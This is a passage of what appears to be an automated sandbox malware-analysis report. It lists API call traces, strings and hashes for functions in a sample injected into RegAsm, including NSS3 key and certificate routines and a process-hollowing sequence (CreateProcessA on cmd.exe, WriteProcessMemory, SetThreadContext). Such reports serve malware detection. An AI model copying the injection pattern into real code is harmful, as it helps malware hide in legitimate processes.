                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C0A7585
                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0A7598
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0A75AC
                                                                                                          • Part of subcall function 6C0CAB89: EnterCriticalSection.KERNEL32(6C11E370,?,?,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284), ref: 6C0CAB94
                                                                                                          • Part of subcall function 6C0CAB89: LeaveCriticalSection.KERNEL32(6C11E370,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0CABD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                        • Opcode ID: 8330a7ef091e7f222c7a781fbdfd615a5a70659ebef9ab0dd27acb3311ea0428
                                                                                                        • Instruction ID: 5968dc335e19401b553a70c1e67ece8385c96aae93cf09f83e9c4dc4e6bb1054
                                                                                                        • Opcode Fuzzy Hash: 8330a7ef091e7f222c7a781fbdfd615a5a70659ebef9ab0dd27acb3311ea0428
                                                                                                        • Instruction Fuzzy Hash: 4F52F5B1A002149FEB21DFA8CD85BAA77FCEF45708F108199E91897A41DB34AF85CF51
                                                                                                        Function 6C214840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C1F601B,?,00000000,?), ref: 6C21486F
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C2148A8
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C2148BE
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C2148DE
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C2148F5
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C21490A
                                                                                                        • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C214919
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C21493F
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214970
                                                                                                        • PORT_Alloc_Util.NSS3(00000001), ref: 6C2149A0
                                                                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C2149AD
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C2149D4
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C2149F4
                                                                                                        • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C214A10
                                                                                                        • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C214A27
                                                                                                        • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C214A3D
                                                                                                        • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C214A4F
                                                                                                        • PL_strcasecmp.NSS3(00000000,every), ref: 6C214A6C
                                                                                                        • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C214A81
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214AAB
                                                                                                        • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C214ABE
                                                                                                        • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C214ADC
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214B17
                                                                                                        • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C214B33
                                                                                                          • Part of subcall function 6C214120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C21413D
                                                                                                          • Part of subcall function 6C214120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C214162
                                                                                                          • Part of subcall function 6C214120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C21416B
                                                                                                          • Part of subcall function 6C214120: PL_strncasecmp.NSS3(2B!l,?,00000001), ref: 6C214187
                                                                                                          • Part of subcall function 6C214120: NSSUTIL_ArgSkipParameter.NSS3(2B!l), ref: 6C2141A0
                                                                                                          • Part of subcall function 6C214120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2141B4
                                                                                                          • Part of subcall function 6C214120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C2141CC
                                                                                                          • Part of subcall function 6C214120: NSSUTIL_ArgFetchValue.NSS3(2B!l,?), ref: 6C214203
                                                                                                        • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C214B53
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214B94
                                                                                                        • free.MOZGLUE(?), ref: 6C214BA7
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214BB7
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214BC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                        • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                        • API String ID: 3791087267-1256704202
                                                                                                        • Opcode ID: 7c803ec04574af7650388a62427d23062a2aa63ad801c8bb43a370918b0c6da6
                                                                                                        • Instruction ID: a728b328f3fd5e4a5e6f74d0fc17076e2f6b8f5a0aa2e7dea464fe21ad90ded4
                                                                                                        • Opcode Fuzzy Hash: 7c803ec04574af7650388a62427d23062a2aa63ad801c8bb43a370918b0c6da6
                                                                                                        • Instruction Fuzzy Hash: 5EC1F871E0925E5BDB10DF689C40BAE7BF8AF0620DF140029EE99A7E41E7319A14C7A1
                                                                                                        Function 00415B0B Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 179stringmemoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                        • wsprintfA.USER32 ref: 00415B50
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                        • wsprintfA.USER32 ref: 00415BC9
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
                                                                                                          • Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
                                                                                                          • Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
                                                                                                          • Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00415CD8
                                                                                                        • FindClose.KERNEL32(?), ref: 00415CEC
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415D1A
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415D2D
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00415D39
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00415D56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                                        • String ID: %s\%s$%s\*$K_A
                                                                                                        • API String ID: 2347508687-1624741228
                                                                                                        • Opcode ID: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
                                                                                                        • Instruction ID: f1f80ab8573884d5547ab2b117a2a7bfd804ed3709ed9bfee1ddc7f274e11282
                                                                                                        • Opcode Fuzzy Hash: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
                                                                                                        • Instruction Fuzzy Hash: 6F713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59
                                                                                                        Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: /$UT
                                                                                                        • API String ID: 0-1626504983
                                                                                                        • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                        • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                        • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                        • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                        Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 0040F57C
                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
                                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
                                                                                                        • ResumeThread.KERNEL32(?), ref: 0040F608
                                                                                                        • WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
                                                                                                        • ResumeThread.KERNEL32(?), ref: 0040F69F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                        • String ID: C:\Windows\System32\cmd.exe$a-A
                                                                                                        • API String ID: 3621800378-431432405
                                                                                                        • Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                                                        • Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
                                                                                                        • Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                                                        • Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24
                                                                                                        Function 6C21EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C21C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C21DAE2,?), ref: 6C21C6C2
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21F0AE
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21F0C8
                                                                                                        • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C21F101
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21F11D
                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C2E218C), ref: 6C21F183
                                                                                                        • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C21F19A
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C21F1CB
                                                                                                        • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C21F1EF
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C21F210
                                                                                                          • Part of subcall function 6C1C52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C21F1E9,?,00000000,?,?), ref: 6C1C52F5
                                                                                                          • Part of subcall function 6C1C52D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C1C530F
                                                                                                          • Part of subcall function 6C1C52D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C1C5326
                                                                                                          • Part of subcall function 6C1C52D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C21F1E9,?,00000000,?,?), ref: 6C1C5340
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C21F227
                                                                                                          • Part of subcall function 6C20FAB0: free.MOZGLUE(?,-00000001,?,?,6C1AF673,00000000,00000000), ref: 6C20FAC7
                                                                                                        • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C21F23E
                                                                                                          • Part of subcall function 6C20BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C1BE708,00000000,00000000,00000004,00000000), ref: 6C20BE6A
                                                                                                          • Part of subcall function 6C20BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C1C04DC,?), ref: 6C20BE7E
                                                                                                          • Part of subcall function 6C20BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C20BEC2
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C21F2BB
                                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C21F3A8
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C21F3B3
                                                                                                          • Part of subcall function 6C1C2D20: PK11_DestroyObject.NSS3(?,?), ref: 6C1C2D3C
                                                                                                          • Part of subcall function 6C1C2D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1C2D5F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1559028977-0
                                                                                                        • Opcode ID: 16dd1b67556d6303a1a50f237598b32acee6785d80f88479b24910bcaf25f58d
                                                                                                        • Instruction ID: 958f4e94c4c12a18be3c7a740e110c86908a5ba70fb7125b13001d72af76ed90
                                                                                                        • Opcode Fuzzy Hash: 16dd1b67556d6303a1a50f237598b32acee6785d80f88479b24910bcaf25f58d
                                                                                                        • Instruction Fuzzy Hash: E8D180B5E0524A9FDB14CF99D880A9FB7F5EF48308F158029EE25A7B11EB31E805CB50
                                                                                                        Function 6C14AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C26CF46,?,6C13CDBD,?,6C26BF31,?,?,?,?,?,?,?), ref: 6C14B039
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C26CF46,?,6C13CDBD,?,6C26BF31), ref: 6C14B090
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,6C26CF46,?,6C13CDBD,?,6C26BF31), ref: 6C14B0A2
                                                                                                        • CloseHandle.KERNEL32(?,?,6C26CF46,?,6C13CDBD,?,6C26BF31,?,?,?,?,?,?,?,?,?), ref: 6C14B100
                                                                                                        • sqlite3_free.NSS3(?,?,00000002,?,6C26CF46,?,6C13CDBD,?,6C26BF31,?,?,?,?,?,?,?), ref: 6C14B115
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,6C26CF46,?,6C13CDBD,?,6C26BF31), ref: 6C14B12D
                                                                                                          • Part of subcall function 6C139EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C14C6FD,?,?,?,?,6C19F965,00000000), ref: 6C139F0E
                                                                                                          • Part of subcall function 6C139EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C19F965,00000000), ref: 6C139F5D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                        • String ID: `,l
                                                                                                        • API String ID: 3155957115-3859844005
                                                                                                        • Opcode ID: 90b55966b2aaeccb01597ad5b839828af9c80d6065d47439fc831b0f10397f92
                                                                                                        • Instruction ID: dfa0a78811c4b688c4c302cb820fbc9f9f9fa2128fc2e54cc3a1bda0e23764b4
                                                                                                        • Opcode Fuzzy Hash: 90b55966b2aaeccb01597ad5b839828af9c80d6065d47439fc831b0f10397f92
                                                                                                        • Instruction Fuzzy Hash: AD91DCB1A04605CFEB04CF25D881BAFB7B5BF56309F15863DE41A97A50EB34E840CB91
                                                                                                        Function 6C1E0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_PubDeriveWithKDF.NSS3 ref: 6C1E0F8D
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1E0FB3
                                                                                                        • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C1E1006
                                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C1E101C
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1E1033
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1E103F
                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C1E1048
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1E108E
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C1E10BB
                                                                                                        • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C1E10D6
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C1E112E
                                                                                                          • Part of subcall function 6C1E1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C1E08C4,?,?), ref: 6C1E15B8
                                                                                                          • Part of subcall function 6C1E1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C1E08C4,?,?), ref: 6C1E15C1
                                                                                                          • Part of subcall function 6C1E1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1E162E
                                                                                                          • Part of subcall function 6C1E1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1E1637
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
